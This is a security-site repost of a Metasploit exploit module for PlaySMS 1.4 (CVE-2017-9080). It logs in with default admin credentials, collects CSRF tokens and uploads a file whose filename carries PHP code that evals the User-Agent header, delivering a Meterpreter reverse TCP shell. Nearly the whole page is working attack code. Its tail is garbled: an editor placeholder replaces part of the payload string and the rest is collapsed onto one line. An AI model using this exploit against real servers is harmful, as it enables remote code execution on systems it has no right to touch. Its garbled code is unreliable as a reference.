首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PlaySMS sendfromfile.php Code Execution
来源:metasploit.com 作者:DarkS3curity 发布时间:2018-05-08  
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'PlaySMS sendfromfile.php Authenticated "Filename" Field Code Execution',
      'Description' => %q{
          This module exploits a code injection vulnerability within an authenticated file
          upload feature in PlaySMS v1.4. This issue is caused by improper file name handling
          in sendfromfile.php file.
          Authenticated Users can upload a file and rename the file with a malicious payload.
          This module was tested against PlaySMS 1.4 on VulnHub's Dina 1.0 machine and Windows 7.
      },
      'Author' =>
        [
          'Touhid M.Shaikh <touhidshaikh22[at]gmail.com>', # Discoverys and Metasploit Module
          'DarkS3curity' # Metasploit Module
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['EDB','42003'],
          ['CVE','2017-9080'],
          ['URL','https://www.youtube.com/watch?v=MuYoImvfpew'],
          ['URL','http://touhidshaikh.com/blog/?p=336']
        ],
      'DefaultOptions' =>
        {
          'SSL'     => false,
          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
          'ENCODER' => 'php/base64',
        },
      'Privileged' => false,
      'Platform'   => ['php'],
      'Arch'       => ARCH_PHP,
      'Targets' =>
        [
          [ 'PlaySMS 1.4', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 21 2017'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base playsms directory path", '/']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'admin']),
        OptString.new('PASSWORD', [ true, "Password to authenticate with", 'admin'])
      ])
  end

  def uri
    return target_uri.path
  end

  def check
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => normalize_uri(uri, 'index.php')
      })
    rescue
      vprint_error('Unable to access the index.php file')
      return CheckCode::Unknown
    end

    if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_auth&route=login')
      return Exploit::CheckCode::Appears
    end

    CheckCode::Safe
  end

  def login
    res = send_request_cgi({
      'uri' => normalize_uri(uri, 'index.php'),
      'method' => 'GET',
      'vars_get' => {
        'app' => 'main',
        'inc' => 'core_auth',
        'route' => 'login',
      }
    })

    # Grabbing CSRF token from body
    /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
    vprint_good("X-CSRF-Token for login : #{csrf}")

    cookies = res.get_cookies
    vprint_status('Trying to Login ......')
    # Send Creds with cookies.
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(uri, 'index.php'),
      'cookie' => cookies,
      'vars_get' => Hash[{
        'app' => 'main',
        'inc' => 'core_auth',
        'route' => 'login',
        'op' => 'login',
      }.to_a.shuffle],
      'vars_post' => Hash[{
        'X-CSRF-Token' => csrf,
        'username' => datastore['USERNAME'],
        'password' => datastore['PASSWORD']
      }.to_a.shuffle],
    })

    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?

    # Try to access index page with authenticated cookie.
    res = send_request_cgi({
      'method' => 'GET',
      'uri' => normalize_uri(uri, 'index.php'),
      'cookie' => cookies,
    })

    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?

    # if we redirect to core_welcome dan we assume we have authenticated cookie.
    if res.code == 302 && res.headers['Location'].include?('index.php?app=main&inc=core_welcome')
      print_good("Authentication successful : [ #{datastore['USERNAME']} : #{datastore['PASSWORD']} ]")
      store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
      return cookies
    else
      fail_with(Failure::UnexpectedReply, "#{peer} - Authentication Failed :[ #{datastore['USERNAME']}:#{datastore['PASSWORD']} ]")
    end
  end

  def exploit
    cookies = login

    # Agian CSRF token.
    res = send_request_cgi({
      'uri' => normalize_uri(uri, 'index.php'),
      'method' => 'GET',
      'cookie' => cookies,
      'vars_get' => Hash[{
        'app' => 'main',
        'inc' => 'feature_sendfromfile',
        'op' => 'list',
      }.to_a.shuffle]
    })

    fail_with(Failure::UnexpectedReply, "#{peer} - Did not respond to Login request") if res.nil?

    # Grabbing CSRF token from body.
    /name="X-CSRF-Token" value="(?<csrf>[a-z0-9"]+)">/ =~ res.body
    fail_with(Failure::UnexpectedReply, "#{peer} - Could not determine CSRF token") if csrf.nil?
    vprint_good("X-CSRF-Token for upload : #{csrf}")

    # Payload.
    evilname = "<?php $t=
___FCKpd___0
SERVER['HTTP_USER_AGENT']; eval($t); ?>" # setup POST request. post_data = Rex::MIME::Message.new post_data.add_part(csrf, content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="X-CSRF-Token"') # CSRF token post_data.add_part("#{rand_text_alpha(8 + rand(5))}", content_type = 'application/octet-stream', transfer_encoding = nil, content_disposition = "form-data; name=\"fncsv\"; filename=\"#{evilname}\"") # payload post_data.add_part("1", content_type = nil, transfer_encoding = nil, content_disposition = 'form-data; name="fncsv_dup"') # extra data = post_data.to_s vprint_status('Trying to upload file with malicious Filename Field....') # Lets Send Upload request. res = send_request_cgi({ 'uri' => normalize_uri(uri, 'index.php'), 'method' => 'POST', 'agent' => payload.encode, 'cookie' => cookies, 'vars_get' => Hash[{ 'app' => 'main', 'inc' => 'feature_sendfromfile', 'op' => 'upload_confirm', }.to_a.shuffle], 'headers' => { 'Upgrade-Insecure-Requests' => '1', }, 'Connection' => 'close', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", }) end end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·WordPress Plugin User Role Edi
·PlaySMS import.php Code Execut
·HWiNFO 5.82-3410 - Denial of S
·DeviceLock Plug and Play Audit
·Windows WMI - Recieve Notifica
·Windows - Local Privilege Esca
·Linux Kernel < 4.17-rc1 - 'AF_
·TBK DVR4104 / DVR4216 - Creden
·GPON Routers - Authentication
·Adobe Reader PDF - Client Side
·Schneider Electric InduSoft We
·Exim < 4.90.1 - 'base64d' Remo
  推荐广告
CopyRight © 2002-2018 VFocuS.Net All Rights Reserved